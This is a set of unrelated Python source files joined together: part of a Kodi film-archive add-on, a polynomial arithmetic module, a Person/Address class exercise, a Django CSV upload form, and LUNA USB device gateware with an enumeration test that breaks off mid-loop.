        # All anchors sharing that href; parts[1] holds the title text.
        parts = soup.select("a[href={}]".format(action.get("href")))
        add_menu_item(play_film,
                      parts[1].text.strip(),
                      args={"href": action.get("href")},
                      art=ku.art(nfpfs.get_url(image.get("src"))),
                      info={"plot": soup.find("h3").find_next("p").text},
                      directory=False)
@plugin.route("/")
def index():
# type: () -> None
"""Main menu"""
add_menu_item(section, "Collections", art=ku.icon("collection.png"))
if ku.get_setting_as_bool("show_recent"):
add_menu_item(recent, 32005, art=ku.icon("recent.png"))
if ku.get_setting_as_bool("show_search"):
add_menu_item(search, 32007, args={"menu": True},
art=ku.icon("search.png"))
if ku.get_setting_as_bool("show_settings"):
add_menu_item(settings, 32010, art=ku.icon("settings.png"), directory=False)
xbmcplugin.setPluginCategory(plugin.handle, ADDON_NAME)
xbmcplugin.endOfDirectory(plugin.handle)
@plugin.route("/section")
def section():
# type: () -> None
"""Show category menu and category playable items"""
href = get_arg("href")
category = get_arg("category", ku.localize(32002))
page = int(get_arg("page", 1))
offset = int(get_arg("offset", 0))
if not href:
# section menu
soup = nfpfs.get_html(nfpfs.NFPF_SCREENING_ROOM_URI)
for item in soup.find_all("table"):
title = item.find("h5").text
add_menu_item(section, title,
args={"href": item.find("a").get("href"), "category": title},
art=ku.art(nfpfs.get_url(item.find("img").get("src"))),
info={"plot": item.find("p").text})
else:
url = nfpfs.get_url(href)
soup = nfpfs.get_html(url)
if url == nfpfs.NFPF_MERCURY_URI:
# odd playable items
parse_mercury(soup)
else:
results = soup.find_all("figure", "video-thumb")
items = results[offset:nfpfs.SEARCH_MAX_RESULTS + offset]
# section paging
if len(results) > len(items) == nfpfs.SEARCH_MAX_RESULTS:
paginate(category, href, page)
for item in items:
# section playable items
action = item.find("figcaption").find("a")
url = nfpfs.get_url(action.get("href"))
data = nfpfs.get_info(nfpfs.get_html(url))
data.get("info")["genre"] = item.get("data-archive")
add_menu_item(play_film,
data.get("title"),
args={"href": url},
art=ku.art(data.get("image")),
info=data.get("info"),
directory=False)
xbmcplugin.setContent(plugin.handle, "videos")
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_VIDEO_YEAR)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_GENRE)
xbmcplugin.setPluginCategory(plugin.handle, category)
xbmcplugin.endOfDirectory(plugin.handle)
@plugin.route("/recent")
def recent():
# type: () -> None
"""Show recently viewed films"""
data = nfpfs.recents.retrieve()
for url in data:
soup = nfpfs.get_html(url)
info = nfpfs.get_info(soup)
add_menu_item(play_film,
info.get("title"),
args={"href": url},
art=ku.art(info.get("image")),
info=info.get("info"),
directory=False)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_VIDEO_YEAR)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_GENRE)
xbmcplugin.setPluginCategory(plugin.handle, ku.localize(32005)) # Recent
xbmcplugin.setContent(plugin.handle, "videos")
xbmcplugin.endOfDirectory(plugin.handle)
@plugin.route("/settings")
def settings():
# type: () -> None
"""Addon Settings"""
ku.show_settings()
xbmc.executebuiltin("Container.Refresh()")
@plugin.route("/play")
def play_film():
# type: () -> None
"""Show playable item"""
href = get_arg("href")
url = nfpfs.get_url(href)
soup = nfpfs.get_html(url)
data = nfpfs.get_info(soup)
if not data.get("video"):
logger.debug("play_film error: {}".format(href))
return
if nfpfs.RECENT_SAVED:
nfpfs.recents.append(url)
list_item = ListItem(path=data.get("video"))
list_item.setInfo("video", data.get("info"))
xbmcplugin.setResolvedUrl(plugin.handle, True, list_item)
@plugin.route("/clear/<idx>")
def clear(idx):
# type: (str) -> None
"""Clear cached or recently played items"""
if idx == "cache" and ku.confirm():
nfpfs.cache_clear()
if idx == "recent" and ku.confirm():
nfpfs.recents.clear()
if idx == "search" and ku.confirm():
nfpfs.searches.clear()
@plugin.route("/search")
def search():
# type: () -> Optional[bool]
"""Search the archive"""
query = get_arg("q")
category = get_arg("category", ku.localize(32007)) # Search
# Remove saved search item
if bool(get_arg("delete", False)):
nfpfs.searches.remove(query)
xbmc.executebuiltin("Container.Refresh()")
return True
# View saved search menu
if bool(get_arg("menu", False)):
add_menu_item(search, "[{}]".format(ku.localize(32016)), args={"new": True}) # [New Search]
for item in nfpfs.searches.retrieve():
text = item.encode("utf-8")
add_menu_item(search, text, args={"q": text, "category": "{} '{}'".format(ku.localize(32007), text)})
xbmcplugin.setPluginCategory(plugin.handle, category)
xbmcplugin.endOfDirectory(plugin.handle)
return True
# New look-up
if bool(get_arg("new", False)):
query = ku.user_input()
if not query:
return False
category = "{} '{}'".format(ku.localize(32007), query)
if nfpfs.SEARCH_SAVED:
nfpfs.searches.append(query)
# Process search
parse_search_results(nfpfs.get_json(nfpfs.NFPF_VIDEOS_URI), query)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_VIDEO_YEAR)
xbmcplugin.addSortMethod(plugin.handle, xbmcplugin.SORT_METHOD_GENRE)
xbmcplugin.setPluginCategory(plugin.handle, category)
xbmcplugin.endOfDirectory(plugin.handle)
def run():
    # type: () -> None
    """Main entry point"""
    plugin.run()   # dispatch the current invocation to the @plugin.route handlers
|
from math import *
def degre(P):
    """Return the degree of P (index of the highest non-zero coefficient,
    ascending-power representation); the zero polynomial gets degree 0."""
    for exponent in reversed(range(1, len(P))):
        if P[exponent] != 0:
            return exponent
    return 0
#print(degre([0,1,2,3,0,5,9,0]))
#print(degre([0]))
#print(degre([0,0,0]))
#print(degre([0,1]))
#print(degre([0,1,2,3,0,5,0,0]))
def reduc(P):
    """Strip trailing zero coefficients from P in place (always keeping at
    least the constant term) and return P."""
    while len(P) > 1 and P[-1] == 0:
        P.pop()
    return P
#print(reduc([0,1,2,3,0,5,0,0]))
#print(reduc([0,1,2,3,0,5]))
#print(reduc([1]))
#print(reduc([0]))
#print(reduc([0,0,0]))
#print(reduc([0,0,0,0,0,0,0]))
def poly_add(P, Q):
    """Return P + Q as a new coefficient list (ascending powers).

    The result has trailing zero coefficients stripped (at least one
    coefficient is kept).  Unlike the previous version, neither argument
    is mutated: the old code added into the longer input list in place.
    """
    total = [0] * max(len(P), len(Q))
    for i, coef in enumerate(P):
        total[i] += coef
    for i, coef in enumerate(Q):
        total[i] += coef
    # Trim trailing zeros, keeping at least the constant term.
    while len(total) > 1 and total[-1] == 0:
        total.pop()
    return total
#print(poly_add([2,3],[3,4]))
def poly_scal(P, a):
    """Return a * P as a new coefficient list with trailing zeros stripped.

    Unlike the previous version, P itself is not mutated.
    """
    scaled = [coef * a for coef in P]
    # Trim trailing zeros, keeping at least the constant term.
    while len(scaled) > 1 and scaled[-1] == 0:
        scaled.pop()
    return scaled
#print(poly_scal([2,3],3))
def poly_multi(P, Q):
    """Return the product P * Q as a new coefficient list.

    Uses a direct O(len(P) * len(Q)) convolution instead of the previous
    O((n+m) * n * m) triple loop, and no longer pads or mutates its inputs.
    An empty operand yields [0], matching the old behaviour.
    """
    if not P or not Q:
        return [0]
    product = [0] * (len(P) + len(Q) - 1)
    for i, p in enumerate(P):
        for j, q in enumerate(Q):
            product[i + j] += p * q
    # Trim trailing zeros, keeping at least the constant term.
    while len(product) > 1 and product[-1] == 0:
        product.pop()
    return product
#print(poly_multi([1,1,1],[1,1,1]))
def eval_naif(P,a):
    """Evaluate P at a naively, accumulating coefficient * a**i terms."""
    total = 0
    power = 1   # a**i, updated incrementally
    for coef in P:
        total += coef * power
        power *= a
    return total
def Horner(P,a):
    """Evaluate polynomial P at a using Horner's scheme.

    The previous version first called reduc(P), which popped trailing zeros
    off the *caller's* list.  Trailing zero coefficients do not change the
    value, so the normalisation is skipped and P is left untouched.  An
    empty P evaluates to 0 instead of raising IndexError.
    """
    acc = 0
    for coef in reversed(P):
        acc = coef + a * acc
    return acc
#print(eval_naif([1,1,1],2))
#print(Horner([1,1,1],2))
def tchebychev(n):
    """Return the coefficients of the Chebyshev polynomial T_n.

    Built from the recurrence T_k = 2x * T_{k-1} - T_{k-2}.
    Fixed: previously n == 0 fell through the loop and returned T_1
    ([0, 1]) instead of T_0 ([1]).
    """
    t0 = [1]
    t1 = [0,1]
    if n == 0:
        return t0
    for i in range(2, n+1):
        (t1, t0) = (poly_add(poly_multi(poly_scal([0,1],2),t1), poly_scal(t0,-1)), t1)
    return t1
#print(tchebychev(2))
def binomial (k, n):
    """Return the binomial coefficient C(n, k) = n! / (k! * (n-k)!)."""
    numerator = 1
    for factor in range(n-k+1, n+1):
        numerator *= factor
    denominator = 1
    for factor in range(1, k+1):
        denominator *= factor
    return numerator // denominator
def tchebychev_sigma(n):
    """Chebyshev T_n via the closed-form sum over k of
    binomial(2k, n) * x^(n-2k) * (x^2 - 1)^k."""
    S=[]
    C=[1]               # (x^2 - 1)^k, starts at k = 0
    D=[0]*(n)+[1]       # monomial x^(n-2k), starts at x^n
    for k in range(n//2+1):
        S=poly_add(poly_scal(poly_multi(D, C), binomial(2*k, n)), S)
        # NOTE(review): on the final iteration n-2k-2 can be negative, making
        # D = [1]; harmless since the loop then ends, but worth confirming.
        D=[0]*(n-2*k-2)+[1]
        C=poly_multi(C, [-1,0,1])
    return S
#print(Horner(tchebychev(3),4))
#print(Horner(tchebychev_sigma(3),4))
#print(tchebychev(2))
#print(Horner(tchebychev(100),cos(5)))
#print(cos(500))
def div_poly(A, B):
    """Euclidean division of polynomial A by B: returns (quotient, remainder).

    Coefficients are ascending; quotient terms are produced from the highest
    degree down, hence the final reversal.
    """
    Q=[]
    R=A[:]          # working remainder (copy so A is untouched)
    n=degre(R)
    p=degre(B)
    b=B[p]          # leading coefficient of the divisor
    for k in range(n,p-1,-1):
        a = R[k]
        Q.append(a/b)
        # Subtract (a/b) * x^(k-p) * B from the running remainder.
        # NOTE(review): poly_add trims R via reduc; if more than one leading
        # term cancels, R[k] on a later iteration could raise IndexError —
        # confirm against div_poly_opt, which updates R in place instead.
        R = poly_add(R, poly_multi(poly_scal([0]*(k-p)+[1],-a/b), B))
    return(Q[::-1], R)
#print(div_poly([1,1,0,1], [1,1])) => ([2, -1, 1], [-1])
def div_poly_opt(A, B):
    """Euclidean division of A by B, like div_poly but subtracting the
    shifted divisor from R in place (no intermediate polynomials).

    Returns (quotient, remainder); note the remainder keeps its original
    length here (leading entries are zeroed, not trimmed).
    """
    Q=[]
    R=A[:]          # working remainder (copy so A is untouched)
    n=degre(R)
    p=degre(B)
    b=B[p]          # leading coefficient of the divisor
    for k in range(n,p-1,-1):
        a = R[k]
        Q.append(a/b)
        # R -= (a/b) * x^(k-p) * B, coefficient by coefficient.
        for i in range(p+1):
            c = -a/b*B[i]
            R[k-p+i]+=c
    return(Q[::-1], R)
#print(div_poly_opt([1,1,0,1], [1,1]))
def compose(P, Q):
    """Return the composition P(Q(x)) as a coefficient list."""
    P=reduc(P)      # NOTE: reduc trims the caller's list in place
    Qn = [1]        # running power Q^i
    R=[0]
    for i in range(len(P)):
        # Accumulate P[i] * Q^i (Qn is copied so poly_scal cannot disturb it).
        R=poly_add(poly_scal(Qn[:], P[i]), R)
        Qn = poly_multi(Qn, Q)
    return R
#print(compose([0,1,1], [1,1]))
|
# You can write a class to represent anything you want.
# For example, write a class to represent an Address — each address has a country, city, street name and house number.
# Modify your Person class to use Address objects instead of string for representing the address.
class Person:
    """A person with a name, age, gender and a list of addresses."""

    def __init__(self, n, age, gender, address):
        self.__name = n
        self.__age = age
        self.__gender = gender
        self.__addresses = []
        # A None address means "no address yet".
        if address is not None:
            self.__addresses.append(address)

    def older(self, comparison):
        """Print whether *comparison* is older than this person."""
        print("Is {}'s age ({}) older than {}'s age ({})?".format(comparison.__name, comparison.__age, self.__name, self.__age))
        print(self.__age < comparison.__age)

    def add_address(self, address):
        """Attach another address to this person."""
        self.__addresses.append(address)

    def display_addresses(self):
        """Return all addresses, numbered, as one multi-line string."""
        lines = [
            "\n Address {}: {}".format(index + 1, addr)
            for index, addr in enumerate(self.__addresses)
        ]
        return "".join(lines)

    def split_names(self):
        """Print the name split into forename/surname plus all addresses."""
        temp = self.__name.split()
        print(f"Forename: {temp[0]}, Surname: {' '.join(temp[1:])}, Addresses: {self.display_addresses()}")
class Address:
    """A postal address; optional parts are passed as None and omitted
    from the string form."""

    def __init__(self, street, street2, city, county, country, postcode):
        self._street = street
        self._street2 = street2
        self._city = city
        self._county = county
        self._country = country
        self._postcode = postcode
        # Snapshot of the parts in display order (kept for compatibility;
        # note it does not track later attribute changes).
        self._attributes = [self._street, self._street2, self._city, self._county, self._country, self._postcode]

    def add_address(self):
        # NOTE(review): this loop only rebinds the local *i*; the input()
        # results are never stored, so the method has no lasting effect.
        # Kept as-is (it is interactive) pending clarification of its intent.
        for i in self._street, self._street2, self._city, self._county, self._country, self._postcode:
            i = input("Enter " + i)

    def __str__(self):
        """Join the non-None parts with ', '.

        Fixed: removed the stray debug print of the attribute list that the
        previous version emitted on every str() call.
        """
        return ", ".join(a for a in self._attributes if a is not None)
a2 = Address("Church road", None, None, "County Hertfordshire", "UK", "ALT 739E")
p1 = Person('Mick Doyle Murphy', 75, 'Male', a2)
p2 = Person('Bob Vance', 80, 'Male', None)
p1.split_names()
p1.older(p2)
a1 = Address("Dunbur", None, "Rathnew", "Wicklow", "Ireland", None)
print(a1)
p1.add_address(a1)
p1.add_address(a1)
p1.add_address(a1)
p1.split_names() |
# In forms.py...
from django import forms
class ModelFormCSVFile(forms.Form):
    """Upload form: a display name plus the CSV file itself."""
    name = forms.CharField(max_length=255)  # human-readable label for the upload
    csvfile = forms.FileField()             # the CSV payload
|
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# SPDX-License-Identifier: BSD-3-Clause
"""
Contains the organizing hardware used to add USB Device functionality
to your own designs; including the core :class:`USBDevice` class.
"""
import logging
import unittest
from luna import configure_default_logging
from amaranth import Signal, Module, Elaboratable, Const
from usb_protocol.types import DescriptorTypes
from usb_protocol.emitters import DeviceDescriptorCollection
from ...interface.ulpi import UTMITranslator
from ...interface.utmi import UTMIInterfaceMultiplexer
from ...interface.gateware_phy import GatewarePHY
from . import USBSpeed, USBPacketID
from .packet import USBTokenDetector, USBHandshakeGenerator, USBDataPacketCRC
from .packet import USBInterpacketTimer, USBDataPacketGenerator, USBHandshakeDetector
from .packet import USBDataPacketReceiver
from .reset import USBResetSequencer
from .endpoint import USBEndpointMultiplexer
from .control import USBControlEndpoint
from ...test import usb_domain_test_case
from ...test.usb2 import USBDeviceTest
class USBDevice(Elaboratable):
    """ Core gateware common to all LUNA USB2 devices.

    The ``USBDevice`` module contains the low-level communications hardware necessary to implement a USB device;
    including hardware for maintaining device state, detecting events, reading data from the host, and generating
    responses.

    This class can be instantiated directly, and used to build a USB device,
    or can be subclassed to create custom device types.

    To configure a ``USBDevice`` from a CPU or other wishbone master, see :class:`USBDeviceController`;
    which can easily be attached using its `attach` method.

    Parameters
    ----------
    bus: [UTMI interface, ULPI Interface]
        The UTMI or ULPI PHY connection to be used for communications.
    handle_clocking: bool, Optional
        True iff we should attempt to connect up the `usb` clock domain to the PHY
        automatically based on the clk signal's I/O direction. This option may not work
        for non-simple connections; in which case you will need to connect the clock signal
        yourself.

    Attributes
    ----------
    connect: Signal(), input
        Held high to keep the current USB device connected; or held low to disconnect.
    low_speed_only: Signal(), input
        If high, the device will operate at low speed.
    full_speed_only: Signal(), input
        If high, the device will be prohibited from operating at high speed.

    frame_number: Signal(11), output
        The current USB frame number.
    microframe_number: Signal(3), output
        The current USB microframe number. Always 0 on non-HS connections.
    sof_detected: Signal(), output
        Pulses for one cycle each time a SOF is detected; and thus our frame number has changed.
    new_frame: Signal(), output
        Strobe that indicates a new frame (not microframe) is detected.
    reset_detected: Signal(), output
        Asserted when the USB device receives a bus reset.

    # State signals.
    suspended: Signal(), output
        High when the device is in USB suspend. This can be (and by the spec must be) used to trigger
        the device to enter lower-power states.
    tx_activity_led: Signal(), output
        Signal that can be used to drive an activity LED for TX.
    rx_activity_led: Signal(), output
        Signal that can be used to drive an activity LED for RX.
    """

    def __init__(self, *, bus, handle_clocking=True):
        """ See the class docstring for parameter documentation. """

        # If this looks more like a ULPI bus than a UTMI bus, translate it.
        # (A 'dir' attribute is characteristic of the ULPI signal set.)
        if hasattr(bus, 'dir'):
            self.utmi       = UTMITranslator(ulpi=bus, handle_clocking=handle_clocking)
            self.bus_busy   = self.utmi.busy
            self.translator = self.utmi
            self.always_fs  = False
            self.data_clock = 60e6

        # If this looks more like raw I/O connections than a UTMI bus, create a pure-gatware
        # PHY to drive the raw I/O signals.
        elif hasattr(bus, 'd_n'):
            self.utmi       = GatewarePHY(io=bus)
            self.bus_busy   = Const(0)
            self.translator = self.utmi
            self.always_fs  = True
            self.data_clock = 12e6

        # Otherwise, use it directly.
        # Note that since a true UTMI interface has separate Tx/Rx/control
        # interfaces, we don't need to care about bus 'busyness'; so we'll
        # set it to a const zero.
        else:
            self.utmi       = bus
            self.bus_busy   = Const(0)
            self.translator = None
            self.always_fs  = True
            self.data_clock = 12e6

        #
        # I/O port
        #
        self.connect           = Signal()
        self.low_speed_only    = Signal()
        self.full_speed_only   = Signal()

        self.frame_number      = Signal(11)
        self.microframe_number = Signal(3)
        self.sof_detected      = Signal()
        self.new_frame         = Signal()
        self.reset_detected    = Signal()

        self.speed             = Signal(2)  # current bus speed (see USBSpeed)
        self.suspended         = Signal()
        self.tx_activity_led   = Signal()
        self.rx_activity_led   = Signal()

        #
        # Internals.
        #
        self._endpoints = []  # endpoint gateware added via add_endpoint()

    def add_endpoint(self, endpoint):
        """ Adds an endpoint interface to the device.

        Parameters
        ----------
        endpoint: Elaborateable
            The endpoint interface to be added. Can be any piece of gateware with a
            :class:`EndpointInterface` attribute called ``interface``.
        """
        self._endpoints.append(endpoint)

    def add_control_endpoint(self):
        """ Adds a basic control endpoint to the device.

        Does not add any request handlers. If you want standard request handlers;
        :attr:`add_standard_control_endpoint` automatically adds standard request handlers.

        Returns
        -------
        Returns the endpoint object for the control endpoint.
        """
        control_endpoint = USBControlEndpoint(utmi=self.utmi)
        self.add_endpoint(control_endpoint)

        return control_endpoint

    def add_standard_control_endpoint(self, descriptors: DeviceDescriptorCollection, **kwargs):
        """ Adds a control endpoint with standard request handlers to the device.

        Parameters will be passed on to StandardRequestHandler.

        Return value
        ------------
        The endpoint object created.
        """

        # Create our endpoint, and add standard descriptors to it.
        control_endpoint = USBControlEndpoint(utmi=self.utmi)
        control_endpoint.add_standard_request_handlers(descriptors, **kwargs)
        self.add_endpoint(control_endpoint)

        return control_endpoint

    def elaborate(self, platform):
        m = Module()

        # If we have a bus translator, include it in our submodules.
        if self.translator:
            m.submodules.translator = self.translator

        #
        # Internal device state.
        #

        # Stores the device's current address. Used to identify which packets are for us.
        address = Signal(7, reset=0)

        # Stores the device's current configuration. Defaults to unconfigured.
        configuration = Signal(8, reset=0)

        #
        # Internal interconnections.
        #

        # Create our reset sequencer, which will be in charge of detecting USB port resets,
        # detecting high-speed hosts, and communicating that we are a high speed device.
        m.submodules.reset_sequencer = reset_sequencer = USBResetSequencer()

        m.d.comb += [
            reset_sequencer.bus_busy        .eq(self.bus_busy),

            # VBUS is considered present as long as the PHY doesn't report session-end.
            reset_sequencer.vbus_connected  .eq(~self.utmi.session_end),
            reset_sequencer.line_state      .eq(self.utmi.line_state),
        ]

        # Create our internal packet components:
        # - A token detector, which will identify and parse the tokens that start transactions.
        # - A data transmitter, which will transmit provided data streams.
        # - A data receiver, which will receive data from UTMI and convert it into streams.
        # - A handshake generator, which will assist in generating response packets.
        # - A handshake detector, which detects handshakes generated by the host.
        # - A data CRC16 handler, which will compute data packet CRCs.
        # - An interpacket delay timer, which will enforce interpacket delays.
        m.submodules.token_detector      = token_detector      = \
            USBTokenDetector(utmi=self.utmi, domain_clock=self.data_clock, fs_only=self.always_fs)
        m.submodules.transmitter         = transmitter         = USBDataPacketGenerator()
        m.submodules.receiver            = receiver            = USBDataPacketReceiver(utmi=self.utmi)
        m.submodules.handshake_generator = handshake_generator = USBHandshakeGenerator()
        m.submodules.handshake_detector  = handshake_detector  = USBHandshakeDetector(utmi=self.utmi)
        m.submodules.data_crc            = data_crc            = USBDataPacketCRC()
        m.submodules.timer               = timer               = \
            USBInterpacketTimer(domain_clock=self.data_clock, fs_only=self.always_fs)

        # Connect our transmitter/receiver to our CRC generator.
        data_crc.add_interface(transmitter.crc)
        data_crc.add_interface(receiver.data_crc)

        # Connect our receiver to our timer.
        timer.add_interface(receiver.timer)

        m.d.comb += [
            # Ensure our token detector only responds to tokens addressed to us.
            token_detector.address  .eq(address),

            # Hook up our data_crc to our receive inputs.
            data_crc.rx_data        .eq(self.utmi.rx_data),
            data_crc.rx_valid       .eq(self.utmi.rx_valid),

            # Connect our state signals to our subordinate components.
            token_detector.speed    .eq(self.speed),
            timer.speed             .eq(self.speed)
        ]

        #
        # Endpoint connections.
        #

        # Create our endpoint multiplexer...
        m.submodules.endpoint_mux = endpoint_mux = USBEndpointMultiplexer()
        endpoint_collection = endpoint_mux.shared

        # Connect our timer and CRC interfaces.
        timer.add_interface(endpoint_collection.timer)
        data_crc.add_interface(endpoint_collection.data_crc)

        m.d.comb += [
            # Low-level hardware interface.
            token_detector.interface                   .connect(endpoint_collection.tokenizer),
            handshake_detector.detected                .connect(endpoint_collection.handshakes_in),

            # Device state.
            endpoint_collection.speed                  .eq(self.speed),
            endpoint_collection.active_config          .eq(configuration),
            endpoint_collection.active_address         .eq(address),

            # Receive interface.
            receiver.stream                            .connect(endpoint_collection.rx),
            endpoint_collection.rx_complete            .eq(receiver.packet_complete),
            endpoint_collection.rx_invalid             .eq(receiver.crc_mismatch),
            endpoint_collection.rx_ready_for_response  .eq(receiver.ready_for_response),
            # Bit 3 of the PID distinguishes DATA0/DATA1.
            endpoint_collection.rx_pid_toggle          .eq(receiver.active_pid[3]),

            # Transmit interface.
            endpoint_collection.tx                     .attach(transmitter.stream),
            handshake_generator.issue_ack              .eq(endpoint_collection.handshakes_out.ack),
            handshake_generator.issue_nak              .eq(endpoint_collection.handshakes_out.nak),
            handshake_generator.issue_stall            .eq(endpoint_collection.handshakes_out.stall),
            transmitter.data_pid                       .eq(endpoint_collection.tx_pid_toggle),
        ]

        # If an endpoint wants to update our address or configuration, accept the update.
        with m.If(endpoint_collection.address_changed):
            m.d.usb += address.eq(endpoint_collection.new_address)
        with m.If(endpoint_collection.config_changed):
            m.d.usb += configuration.eq(endpoint_collection.new_config)

        # Finally, add each of our endpoints to this module and our multiplexer.
        for endpoint in self._endpoints:

            # Create a display name for the endpoint...
            name = endpoint.__class__.__name__
            if hasattr(m.submodules, name):
                # Disambiguate duplicate endpoint classes by object id.
                name = f"{name}_{id(endpoint)}"

            # ... and add it, both as a submodule and to our multiplexer.
            endpoint_mux.add_interface(endpoint.interface)
            m.submodules[name] = endpoint

        #
        # Transmitter multiplexing.
        #

        # Create a multiplexer that will arbitrate access to the transmit lines.
        m.submodules.tx_multiplexer = tx_multiplexer = UTMIInterfaceMultiplexer()

        # Connect each of our transmitters.
        tx_multiplexer.add_input(reset_sequencer.tx)
        tx_multiplexer.add_input(transmitter.tx)
        tx_multiplexer.add_input(handshake_generator.tx)

        m.d.comb += [
            # Connect our transmit multiplexer to the actual UTMI bus.
            tx_multiplexer.output  .attach(self.utmi),

            # Connect up the transmit CRC interface to our UTMI bus.
            data_crc.tx_valid      .eq(tx_multiplexer.output.valid & self.utmi.tx_ready),
            data_crc.tx_data       .eq(tx_multiplexer.output.data),
        ]

        #
        # Device-state management.
        #

        # On a bus reset, clear our address and configuration.
        with m.If(reset_sequencer.bus_reset):
            m.d.usb += [
                address        .eq(0),
                configuration  .eq(0),
            ]

        # Device operating state controls.
        m.d.comb += [
            # Disable our host-mode pulldowns; as we're a device.
            self.utmi.dm_pulldown            .eq(0),
            self.utmi.dp_pulldown            .eq(0),

            # Let our reset sequencer set our USB mode and speed.
            # (always_fs overrides the user's speed-restriction inputs.)
            reset_sequencer.low_speed_only   .eq(self.low_speed_only & ~self.always_fs),
            reset_sequencer.full_speed_only  .eq(self.full_speed_only | self.always_fs),
            self.utmi.op_mode                .eq(reset_sequencer.operating_mode),
            self.utmi.xcvr_select            .eq(reset_sequencer.current_speed),
            self.utmi.term_select            .eq(reset_sequencer.termination_select & self.connect),
        ]

        #
        # Frame/microframe state.
        #

        # Handle each new SOF token as we receive them.
        with m.If(token_detector.interface.new_frame):

            # Update our knowledge of the current frame number.
            m.d.usb += self.frame_number.eq(token_detector.interface.frame)

            # Check if we're receiving a new 1ms frame -- which occurs when the new SOF's
            # frame number is different from the previous one's. This will always be the case
            # on full speed links; and will be the case 1/8th of the time on High Speed links.
            m.d.comb += self.new_frame.eq(token_detector.interface.frame != self.frame_number)

            # If this is a new frame, our microframe count should be zero.
            with m.If(self.new_frame):
                m.d.usb += self.microframe_number.eq(0)

            # Otherwise, this SOF indicates a new _microframe_ [USB 2.0: 8.4.3.1].
            with m.Else():
                m.d.usb += self.microframe_number.eq(self.microframe_number + 1)

        #
        # Device-state outputs.
        #
        m.d.comb += [
            self.speed            .eq(reset_sequencer.current_speed),
            self.suspended        .eq(reset_sequencer.suspended),

            self.sof_detected     .eq(token_detector.interface.new_frame),
            self.reset_detected   .eq(reset_sequencer.bus_reset),

            self.tx_activity_led  .eq(tx_multiplexer.output.valid),
            self.rx_activity_led  .eq(self.utmi.rx_valid)
        ]

        return m
class FullDeviceTest(USBDeviceTest):
    """ :meta private: """

    # Simulate a complete USBDevice; clocking is handled by the test harness.
    FRAGMENT_UNDER_TEST = USBDevice
    FRAGMENT_ARGUMENTS  = {'handle_clocking': False}

    def traces_of_interest(self):
        # Waveform signals captured when this test dumps a VCD.
        return (
            self.utmi.tx_data,
            self.utmi.tx_valid,
            self.utmi.rx_data,
            self.utmi.rx_valid,
        )

    def initialize_signals(self):

        # Keep our device from resetting.
        yield self.utmi.line_state.eq(0b01)

        # Have our USB device connected.
        yield self.dut.connect.eq(1)

        # Pretend our PHY is always ready to accept data,
        # so we can move forward quickly.
        yield self.utmi.tx_ready.eq(1)

    def provision_dut(self, dut):
        # Build a minimal-but-complete descriptor set for the enumeration test.
        self.descriptors = descriptors = DeviceDescriptorCollection()

        with descriptors.DeviceDescriptor() as d:
            d.idVendor           = 0x16d0
            d.idProduct          = 0xf3b

            d.iManufacturer      = "LUNA"
            d.iProduct           = "Test Device"
            d.iSerialNumber      = "1234"

            d.bNumConfigurations = 1

        # Provide a core configuration descriptor for testing.
        with descriptors.ConfigurationDescriptor() as c:

            with c.InterfaceDescriptor() as i:
                i.bInterfaceNumber = 0

                with i.EndpointDescriptor() as e:
                    e.bEndpointAddress = 0x01
                    e.wMaxPacketSize   = 512

                with i.EndpointDescriptor() as e:
                    e.bEndpointAddress = 0x81
                    e.wMaxPacketSize   = 512

        dut.add_standard_control_endpoint(descriptors)

    @usb_domain_test_case
    def test_enumeration(self):

        # Reference enumeration process (quirks merged from Linux, macOS, and Windows):
        # - Read 8 bytes of device descriptor.
        # - Read 64 bytes of device descriptor.
        # - Set address.
        # - Read exact device descriptor length.
        # - Read device qualifier descriptor, three times.
        # - Read config descriptor (without subordinates).
        # - Read language descriptor.
        # - Read Windows extended descriptors. [optional]
        # - Read string descriptors from device descriptor (wIndex=language id).
        # - Set configuration.
        # - Read back configuration number and validate.

        # Read 8 bytes of our device descriptor.
        handshake, data = yield from self.get_descriptor(DescriptorTypes.DEVICE, length=8)
        self.assertEqual(handshake, USBPacketID.ACK)
        self.assertEqual(bytes(data), self.descriptors.get_descriptor_bytes(DescriptorTypes.DEVICE)[0:8])

        # Read 64 bytes of our device descriptor, no matter its length.
        handshake, data = yield from self.get_descriptor(DescriptorTypes.DEVICE, length=64)
        self.assertEqual(handshake, USBPacketID.ACK)
        self.assertEqual(bytes(data), self.descriptors.get_descriptor_bytes(DescriptorTypes.DEVICE))

        # Send a nonsense request, and validate that it's stalled.
        handshake, data = yield from self.control_request_in(0x80, 30, length=10)
        self.assertEqual(handshake, USBPacketID.STALL)

        # Send a set-address request; we'll apply an arbitrary address 0x31.
        yield from self.set_address(0x31)
        self.assertEqual(self.address, 0x31)

        # Read our device descriptor.
        handshake, data = yield from self.get_descriptor(DescriptorTypes.DEVICE, length=18)
        self.assertEqual(handshake, USBPacketID.ACK)
        self.assertEqual(bytes(data), self.descriptors.get_descriptor_bytes(DescriptorTypes.DEVICE))

        # Read our device qualifier descriptor.
        # (This device has no qualifier descriptor, so each read should stall.)
        for _ in range(3):
            handshake, data = yield from self.get_descriptor(DescriptorTypes.DEVICE_QUALIFIER, length=10)
            self.assertEqual(handshake, USBPacketID.STALL)

        # Read our configuration descriptor (no subordinates).
        handshake, data = yield from self.get_descriptor(DescriptorTypes.CONFIGURATION, length=9)
        self.assertEqual(handshake, USBPacketID.ACK)
        self.assertEqual(bytes(data), self.descriptors.get_descriptor_bytes(DescriptorTypes.CONFIGURATION)[0:9])

        # Read our configuration descriptor (with subordinates).
        handshake, data = yield from self.get_descriptor(DescriptorTypes.CONFIGURATION, length=32)
        self.assertEqual(handshake, USBPacketID.ACK)
        self.assertEqual(bytes(data), self.descriptors.get_descriptor_bytes(DescriptorTypes.CONFIGURATION))

        # Read our string descriptors.
        # (Index 0 is the language-ID descriptor; 1-3 are the strings above.)
        for i in range(4):
